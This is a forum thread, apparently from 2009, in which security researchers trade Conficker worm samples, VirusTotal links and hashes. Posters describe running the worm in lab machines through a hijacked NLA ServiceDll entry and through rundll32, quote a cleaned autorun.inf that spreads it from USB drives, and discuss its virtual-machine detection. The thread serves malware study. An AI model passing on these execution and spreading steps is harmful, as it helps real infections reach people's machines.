Sample Request for Conficker Version C

This is the b++ variant, which I already obtained from the DB. I'm looking for the C variant. Thanks though!

Thats MS Classified C, so if your looking for MS D that would be a different file for sure.

Symantec would call this one B or B++ and the one what your looking for is thier classified C version, I suspect.

F**king names make me sick anyways, will dig back, I gotta few Ds laying around here somewhere.

http://www.offensivecomputing.net/?q=ocsearch&ocq=5e279ef7fcb58f841199e0ff55cdea8b

http://www.virustotal.com/analisis/1b8557969145f32854ee8b4b04e6d64f

Microsoft 1.4502 2009.03.26 Worm:Win32/Conficker.D

Symantec 1.4.4.12 2009.03.26 W32.Downadup.C

Hell...Sophos is so badass they are several series ahead of everybody. ;)

Sophos 4.40.0 2009.03.26 W32/Confick-G

Thanks for the sample! Have you managed to make it run? Care to share your experience? :D

Hmmmmm.....

You can be a cheesey one like me and use a non critical service your test machine isnt really using, that also uses netsvc

For instance, I use Nla and changed the servicedll pointer in the registry to point at my fick file. :)

Heh!...it worked too.

Also hear its best not to use the .dll extension, use something else, otherwise, I wouldnt want to discuss much more about it out in public.

Thanks for the sample. This is exactly what I've been looking for!

Glad it helps ;)

Have fun playing, kills snot outa some tools I use alot, no more tcpview unless renamed, same with wireshark and some others. :(

Hi,
i got the binary, saved it as a .dll and modified the ServiceDll for NLA and i am seeing an error saying DLL init routine failed. Is the sample not supposed to be in DLL format? any info will be helpful.

-D

I havent a clue how you went about things but sounds like your on the right track.

I just made the shit up as I went along, I couldnt find a 40 oz. in a wet paper bag usually. ;)

I did notice, it takes some minutes after boot to begin to visibly see the traffic, then ofcource youll need some of the network hackables in order for it to spread.

Otherwise, just rename tcpview or the wireshark executable and watch the traffic as it increases.

Thanks, it feels good to know i am moving in the right direction!
i slightly modified the process of inserting Conflicker. followed the method described in http://mtc.sri.com/Conficker/
Save the conflicker variant given in this link as malware.dll in the system32 folder. Modified the NLA serviceDll path to my malware.dll. Rebooted the system. Went into services.msc restarted the network location awareness. the service doesnt load the DLL and i am seeing the errror "A dynamic link library (DLL) intialization routine failed". Am i supposed to rename it to .dll? Is this right version of conflicker? can someone please give me a working version?

Thanks
-D

That should have done it. A good way to test is to copy and rename notepad.exe to procexp.exe (one of the Conficker blacklisted executable names) and run it. It should run, then quickly exit. It it does, then you're infected. Also, try and visit www.microsoft.com (if youre not behind a proxy). If you can't, again, infected.

Hey

I have got few samples of conficker but my question is how to make a initial setup of VMware secured i.e. to protect my HOST PC from GUEST PC(s) infection to be spread over if the worm is having anti-virtualization/anti-vmware techniques to jump over network nodes.

https://www.virustotal.com/analisis/2be239a72ff7431595269526273c747c

eSafe - - Win32.Conficker.X

Shirkdog

divyagaru....you are probably not being patient enough, Ive done exactly what your doing and was able to see traffic within a 5 to 10 minute period.

Why i've no version in my virustotal :

http://www.virustotal.com/analisis/668e45756c9f42e057149c3fa6def638

Version Last Update Result
a-squared - - Net-Worm.Win32.Kido!IK
AhnLab-V3 - - Win32/Conficker.worm.88576
AntiVir - - Worm/Conficker.D.1

as you :

http://www.virustotal.com/analisis/1b8557969145f32854ee8b4b04e6d64f

a-squared 4.0.0.101 2009.03.26 Net-Worm.Win32.Kido!IK
AhnLab-V3 5.0.0.2 2009.03.26 Win32/Conficker.worm.88576
AntiVir 7.9.0.129 2009.03.26 Worm/Conficker.D.1

???

thx

Yea I get both error messages when I run the binary using this cheesey method but also if I wait about 15 minutes after trying to manually launch the service, Ill start seeing things like:

Process Explorer dies and disappears, TCPView just disappears, gmer wont run unless renamed,wireshark wont run unless renamed, these are just tale tell signs I know the infection is running.

There is obviously an injection method they use but I have no idea what it is for now.

Good Luck.

I didn't receive the error messages, however ProcExp died and WireShark won't run unless renamed. You guys say that you can see network traffic within about 15 minutes. What type of traffic should I expect to see?

Thank you guys for confirming. Would one of you please send me the dll copy you have? divyagaru@yahoo.com

I had a similar experience, however, I receive error 32

'Could not start the Network Location Awareness (NLA) service on Local Computer. Error 32: The process cannot access the file because it is being used by another process.

I renamed process explorer and opened it. Searched for malware.dll and the handle shows up under svchost.exe

I still don't see much network traffic.

http://img23.imageshack.us/img23/7475/confickerc.jpg

Anyone please share the working version of Conflicker

Thanks, I tried that originally, actually.

The rundll32.exe bit does not work because you need to also specify the entry routine in the dll. I was able to infect a blank USB drive with Conficker.B using rundll32 confickerb , . Then I used that drive to infect my lab machines.

To your statement about anti-debug, the answer is yes. There is a specific check for VM's. During execution, Conficker stores the Local Descriptor Table in a register that is then compared with certain values (namely 0). This allows Conficker to detect if it's running in a virtual machine – LDT of a native system will be 0x0000 while in VMWare (or VirtualPC) LDT will be relocated (for example, in VMWare 4 it will often be 0x4058).
Hope this helps,
Rob

Thanks for your useful reply. about your first paragraph, this is the exact method that autorun.inf is using to infect computers altho if you look at it , it seems unreadable but most of them are garbage and will be ignored (this is the most nasty autorun Ive ever seen. it's using even control characters to manipulate the final result and its dynamic that means an active virus would change it with dummy bytes in order to fooling anti-viruses.) anyway, after cleaning autorun.inf, you'll end up with something like this:

[AUTorUN]
icon=%syStEmrOot%\sySTEM32\sHELL32.Dll,4
shelLExECUte=RuNdLl32.EXE .\RECYCLER\S-x-x-xx-2819952290-8240758988-879315005-xxxx\jwgkvsq.vmx,ahaezedrn
useAuTopLAY=1

as you see, you can use rundll32 with that parameter. ( you should not use .dll extenstion for this file otherwise virus would think its already installed and will exit, my advice, use that exact file name )

about your second paragraph, yes seems you're right. the malware is using anti-vm and its nearly impossible fooling all VM detection systems around by just manipulating your guest OS:

http://handlers.sans.org/tliston/ThwartingVMDetection_Liston_Skoudis.pdf

the best way would be unpacking malware and patch the anti-debug instead of changing the settings and hoping for a miracle.

And can you pls verify this? :

CRC32: 32D4ED93
MD5: 5E279EF7FCB58F841199E0FF55CDEA8B
SHA-1: 97256A110C2D1910278F057034B5716448DC04E8
SHA-512: 97B4DB923FE26C1AE2F9E0896D55878078D6067348EDCF488DD0A2A1143B99F146501824807F29C9260A1D6F31D75244CB6BED478B35446CB691C6B8D72B034C

(and would you pls upload the malware (that one in your infected usb) for us? ( if it has different hashes ofcourse ))
Thanks

Best regards
Hamy